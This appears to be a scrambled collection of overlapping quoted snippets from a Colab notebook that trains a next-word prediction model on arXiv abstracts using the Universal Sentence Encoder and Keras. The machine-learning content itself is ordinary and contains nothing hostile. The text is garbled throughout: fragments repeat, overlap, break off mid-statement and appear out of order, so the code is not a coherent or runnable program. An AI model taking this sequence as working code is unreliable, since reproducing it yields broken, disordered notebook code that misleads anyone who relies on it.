learning and Machine learning", "output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 # Read local", "= model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text +", "item in collection: text = item for i in range(extent): prediction = model.predict(x=embed([item]).numpy())", "Google Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" #", "item + '\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n') # Tests -", "This will take a while but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\"", "import LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import", "y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model", "y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict and show detailed", "keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from keras.layers", "Uncomment text under **PREVIEW OUTPUT** to further scrutinize. \"\"\" # Commented out IPython", "permissions for Colab to access Google Drive from google.colab import drive drive.mount(\"/gdrive\") #", "numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10])", "Tensorflow tutorial from Stanford, so all predicted words will be based on Deep", "LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split", "that the **Current User** may be less fatigued and see beauty in the", "import string import numpy as np import pandas as pd import seaborn as", "be less fatigued and see beauty in the good work._ Uncomment text under", "import numpy import string import numpy as np import pandas as pd import", "be based on Deep learning and Machine learning _common terms_. \"\"\" # Storing", "the Universal Sentence Encoder's TF Hub module (Here we're making use of version", "texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) #", "X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train", "url to accept permissions for Colab to access Google Drive from google.colab import", "comments are written to facilitate smooth evaluation of the model, that the **Current", "' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 #", "+ ' --> ' + item + '\\nNEXT WORD: ' + item.split(' ')[-1]", "and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is", "y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function", "import numpy as np import pandas as pd import seaborn as sns import", "import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting all required libraries", "embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping", "+ '\\n') # Tests - please feel free to explore single_text = ['and", "Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train,", "from keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from", "X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy = [0 for i in", "y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train)", "we're making use of version 4) # This will take a while but", "the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100,", "from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test,", "')[-1] + '\\n') # Tests - please feel free to explore single_text =", "X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train =", "model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu'))", "nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is based on a", "Sentence Encoder.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL #", "numpy import string import numpy as np import pandas as pd import seaborn", "of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {} for strings,", "sns import tensorflow as tf from absl import logging import tensorflow_hub as hub", "+ vocabulary[idx] print(text + ' --> ' + item + '\\nNEXT WORD: '", "c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy = [0 for", "optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test,", "local file from directory with open('corpus.txt') as subject: cache = subject.readlines() translator =", "# print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building", "into Train sets and test sets X = [] y = [] for", "convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The", "appreciate = hub.load(module_url) # Making it easier - Function for embedding def embed(goodness):", "'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is based on a Tensorflow", "less fatigued and see beauty in the good work._ Uncomment text under **PREVIEW", "'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model.", "The Dataset is based on a Tensorflow tutorial from Stanford, so all predicted", "\"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. Original file is", "= c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy = [0", "to access Google Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import", "data into Train sets and test sets X = [] y = []", ":: # print(lines[0][:100]) # len(lines) # Generate an list of single/independent words vocabulary", "sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\" # Download data from", "tf from absl import logging import tensorflow_hub as hub from tensorflow import keras", "drive for local storage** _NB: All comments are written to facilitate smooth evaluation", "from tensorflow import keras import matplotlib.pyplot as plt from keras.models import Sequential import", "for local storage** _NB: All comments are written to facilitate smooth evaluation of", "# Generate an list of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store", "''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt'", "punctuation lines = [doc.lower().translate(translator) for doc in cache] # Switch to lower case", "as plt from keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import", "batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to", "Generate an list of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store =", "a while but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url)", "\"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential()", "prompt an external url to accept permissions for Colab to access Google Drive", "= subject.readlines() translator = str.maketrans('', '', string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator)", "compatibility. # This cell will prompt an external url to accept permissions for", "yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X,", "\"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier - Function for embedding def", "words text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"##", "Universal Sentence Encoder's TF Hub module (Here we're making use of version 4)", "Colab to access Google Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"#", "text under **PREVIEW OUTPUT** to further scrutinize. \"\"\" # Commented out IPython magic", "based on a Tensorflow tutorial from Stanford, so all predicted words will be", "= [0 for i in range(len(vocabulary))] # Generate Y from the Vocabulary #", "i in range(len(vocabulary))] # Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1", "Import the Universal Sentence Encoder's TF Hub module (Here we're making use of", "idx = np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text + ' -->", "sets X = [] y = [] for c in lines: xxxx =", "the U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test =", "cell will prompt an external url to accept permissions for Colab to access", "40 # Read local file from directory with open('corpus.txt') as subject: cache =", "test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: #", "as K from keras.layers.recurrent import LSTM from keras.layers import Dense, Activation from keras.callbacks", "numpy as np import pandas as pd import seaborn as sns import tensorflow", "= embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy() # PREVIEW OUTPUT :: #", "predicted words will be based on Deep learning and Machine learning _common terms_.", "located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB: All comments are", "All comments are written to facilitate smooth evaluation of the model, that the", "by Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local", "the corpus yyyy = [0 for i in range(len(vocabulary))] # Generate Y from", "in collection: text = item for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx", "c in lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the", "= numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) #", "len(lines) # Generate an list of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' ')))", "REVIEW OUTPUT :: # appreciate.variables # Wrapping up with the U-S-E X_train =", "Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive", "evaluation of the model, that the **Current User** may be less fatigued and", "import tensorflow_hub as hub from tensorflow import keras import matplotlib.pyplot as plt from", "hub.load(module_url) # Making it easier - Function for embedding def embed(goodness): return appreciate(goodness)", "# Download data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url", "= ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40", "y = [] for c in lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1]))", "# %ls \"\"\"# **Import ***\"\"\" # Getting all required libraries import os import", "cache] # Switch to lower case # PREVIEW OUTPUT :: # print(lines[0][:100]) #", "for doc in cache] # Switch to lower case # PREVIEW OUTPUT ::", "import tensorflow as tf from absl import logging import tensorflow_hub as hub from", "long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier -", "and see beauty in the good work._ Uncomment text under **PREVIEW OUTPUT** to", "output, quiet=False) # sentence_length = 40 # Read local file from directory with", "sentence_length = 40 # Read local file from directory with open('corpus.txt') as subject:", "' ' + vocabulary[idx] print(text + ' --> ' + item + '\\nNEXT", "record** The Dataset is based on a Tensorflow tutorial from Stanford, so all", "access Google Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\"", "the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train,", "Encoder's TF Hub module (Here we're making use of version 4) # This", "an list of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {}", "i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' '", "Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train, y_test", "up with the U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train = X_train.numpy()", "tutorial from Stanford, so all predicted words will be based on Deep learning", "won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it", "work._ Uncomment text under **PREVIEW OUTPUT** to further scrutinize. \"\"\" # Commented out", "# yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train, y_test =", "\"\"\" # Commented out IPython magic to ensure Python compatibility. # This cell", "# model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation =", "import keras import matplotlib.pyplot as plt from keras.models import Sequential import tensorflow.keras.backend as", "seaborn as sns import tensorflow as tf from absl import logging import tensorflow_hub", "tests!**\"\"\" # Create function to predict and show detailed output def next_word(collection=[], extent=1):", "= list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {} for strings, texts in enumerate(vocabulary): primary_store[texts]", "tensorflow_hub as hub from tensorflow import keras import matplotlib.pyplot as plt from keras.models", "yyyy = [0 for i in range(len(vocabulary))] # Generate Y from the Vocabulary", "_NB: All comments are written to facilitate smooth evaluation of the model, that", "yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)", "explore single_text = ['and some other essential'] next_word(single_text) # Testing on a collection", "to facilitate smooth evaluation of the model, that the **Current User** may be", "local storage** _NB: All comments are written to facilitate smooth evaluation of the", "appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping up with the U-S-E", "subject: cache = subject.readlines() translator = str.maketrans('', '', string.punctuation) # Remove punctuation lines", "'\\n') # Tests - please feel free to explore single_text = ['and some", "y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT ::", "Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the", "using Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. Original file is located at", "# Wrapping up with the U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train", "Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage**", "the record** The Dataset is based on a Tensorflow tutorial from Stanford, so", "print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence Encoder's", "model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512]))", "an external url to accept permissions for Colab to access Google Drive from", "= Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512],", "may be less fatigued and see beauty in the good work._ Uncomment text", "print(text + ' --> ' + item + '\\nNEXT WORD: ' + item.split('", "-*- coding: utf-8 -*- \"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated by", "import re import gdown import numpy import string import numpy as np import", "embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy() # PREVIEW OUTPUT", "vocabulary[idx] print(text + ' --> ' + item + '\\nNEXT WORD: ' +", "= np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text + ' --> '", "tensorflow as tf from absl import logging import tensorflow_hub as hub from tensorflow", "[] for c in lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X", "= strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) # Splitting data", "from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting all", "Encoder.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google", "single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {} for strings, texts", "and Machine learning _common terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy',", "'.join(xxxx[:-1])) # X from the corpus yyyy = [0 for i in range(len(vocabulary))]", "generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for", "coding: utf-8 -*- \"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated by Colaboratory.", "gdown.download(url, output, quiet=False) # sentence_length = 40 # Read local file from directory", "list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {} for strings, texts in enumerate(vocabulary): primary_store[texts] =", "--> ' + item + '\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n')", "the good work._ Uncomment text under **PREVIEW OUTPUT** to further scrutinize. \"\"\" #", "import seaborn as sns import tensorflow as tf from absl import logging import", "open('corpus.txt') as subject: cache = subject.readlines() translator = str.maketrans('', '', string.punctuation) # Remove", "sets and test sets X = [] y = [] for c in", "item.split(' ')[-1] + '\\n') # Tests - please feel free to explore single_text", "= 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train, y_train, batch_size=512,", "Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation", "from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"##", "url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length =", "the tests!**\"\"\" # Create function to predict and show detailed output def next_word(collection=[],", "import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from keras.layers import Dense, Activation", "easier - Function for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT ::", ":: # print(vocabulary[:50]) # len(vocabulary) # Splitting data into Train sets and test", "X_train = X_train.numpy() X_test = X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) #", "case # PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate an list", "will be based on Deep learning and Machine learning _common terms_. \"\"\" #", "This cell will prompt an external url to accept permissions for Colab to", "model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512,", "next_word(text_collection) \"\"\"## **For the record** The Dataset is based on a Tensorflow tutorial", "keras import matplotlib.pyplot as plt from keras.models import Sequential import tensorflow.keras.backend as K", "will prompt an external url to accept permissions for Colab to access Google", "print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"#", "- please feel free to explore single_text = ['and some other essential'] next_word(single_text)", "y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10])", "LSTM from keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import", "keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data", "import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings", "for Colab to access Google Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls", "print(lines[0][:100]) # len(lines) # Generate an list of single/independent words vocabulary = list(set('", "Switch to lower case # PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) #", "keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection", "# Testing on a collection of words text_collection = ['deep convolutional', 'simple and", "prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text", "from keras.layers.recurrent import LSTM from keras.layers import Dense, Activation from keras.callbacks import LambdaCallback", "Read local file from directory with open('corpus.txt') as subject: cache = subject.readlines() translator", "y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test)", "hub from tensorflow import keras import matplotlib.pyplot as plt from keras.models import Sequential", "and test sets X = [] y = [] for c in lines:", "'', string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator) for doc in cache] #", "# PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) # Splitting data into Train", "# print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape)", "to accept permissions for Colab to access Google Drive from google.colab import drive", "Tests - please feel free to explore single_text = ['and some other essential']", "U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy()", "\"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE') ## END OF", "making use of version 4) # This will take a while but won't", "') X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy = [0 for i", "# This cell will prompt an external url to accept permissions for Colab", "with open('corpus.txt') as subject: cache = subject.readlines() translator = str.maketrans('', '', string.punctuation) #", "lines = [doc.lower().translate(translator) for doc in cache] # Switch to lower case #", "list of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split(' '))) primary_store = {} for", "y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model =", "of the model, that the **Current User** may be less fatigued and see", ":: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape,", "https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB: All comments are written to", "strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) # Splitting data into", "as sns import tensorflow as tf from absl import logging import tensorflow_hub as", "'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True,", "ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url,", "strings, texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50])", "Getting all required libraries import os import re import gdown import numpy import", "len(vocabulary) # Splitting data into Train sets and test sets X = []", "''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length", "Dataset is based on a Tensorflow tutorial from Stanford, so all predicted words", "free to explore single_text = ['and some other essential'] next_word(single_text) # Testing on", "metrics=['acc']) model.summary() # Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test),", "\"\"\"# **Import ***\"\"\" # Getting all required libraries import os import re import", "def next_word(collection=[], extent=1): for item in collection: text = item for i in", "other essential'] next_word(single_text) # Testing on a collection of words text_collection = ['deep", "Function for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables", "to lower case # PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate", "translator = str.maketrans('', '', string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator) for doc", "PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape,", "Machine learning _common terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary)", "**Data preparation - _Generating Corpus_**\"\"\" # Download data from Google drive ''' ORIGINAL", "X_test = embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy() # PREVIEW OUTPUT ::", "pandas as pd import seaborn as sns import tensorflow as tf from absl", "_Generating Corpus_**\"\"\" # Download data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt", "+ '\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n') # Tests - please", "# print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF", "from Stanford, so all predicted words will be based on Deep learning and", "print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential()", "to explore single_text = ['and some other essential'] next_word(single_text) # Testing on a", "Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import", "scrutinize. \"\"\" # Commented out IPython magic to ensure Python compatibility. # This", "['and some other essential'] next_word(single_text) # Testing on a collection of words text_collection", "1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25,", "show detailed output def next_word(collection=[], extent=1): for item in collection: text = item", "OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" #", "file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB: All", "import gdown import numpy import string import numpy as np import pandas as", "TF Hub module (Here we're making use of version 4) # This will", "drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting all required libraries import", "OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) # Splitting data into Train sets and", "of words text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection)", "# PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"##", "# print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence", "keras.layers.recurrent import LSTM from keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from", "OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape,", "some other essential'] next_word(single_text) # Testing on a collection of words text_collection =", "train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT", "subject.readlines() translator = str.maketrans('', '', string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator) for", "is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB: All comments", "the model, that the **Current User** may be less fatigued and see beauty", "X from the corpus yyyy = [0 for i in range(len(vocabulary))] # Generate", "https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False) #", "str.maketrans('', '', string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator) for doc in cache]", "for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += '", "Deep learning and Machine learning _common terms_. \"\"\" # Storing data vocabulary =", "Making it easier - Function for embedding def embed(goodness): return appreciate(goodness) # REVIEW", "under **PREVIEW OUTPUT** to further scrutinize. \"\"\" # Commented out IPython magic to", "import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation", "PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate an list of single/independent", "quiet=False) # sentence_length = 40 # Read local file from directory with open('corpus.txt')", "= [] y = [] for c in lines: xxxx = c.replace('\\n','').split(' ')", "activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training", "single_text = ['and some other essential'] next_word(single_text) # Testing on a collection of", "tensorflow import keras import matplotlib.pyplot as plt from keras.models import Sequential import tensorflow.keras.backend", "in lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the corpus", "Create function to predict and show detailed output def next_word(collection=[], extent=1): for item", "cache = subject.readlines() translator = str.maketrans('', '', string.punctuation) # Remove punctuation lines =", "+ item + '\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n') # Tests", "embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10])", "on a Tensorflow tutorial from Stanford, so all predicted words will be based", "= {} for strings, texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT", "PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\"", "import pandas as pd import seaborn as sns import tensorflow as tf from", "X_test = X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10])", "' --> ' + item + 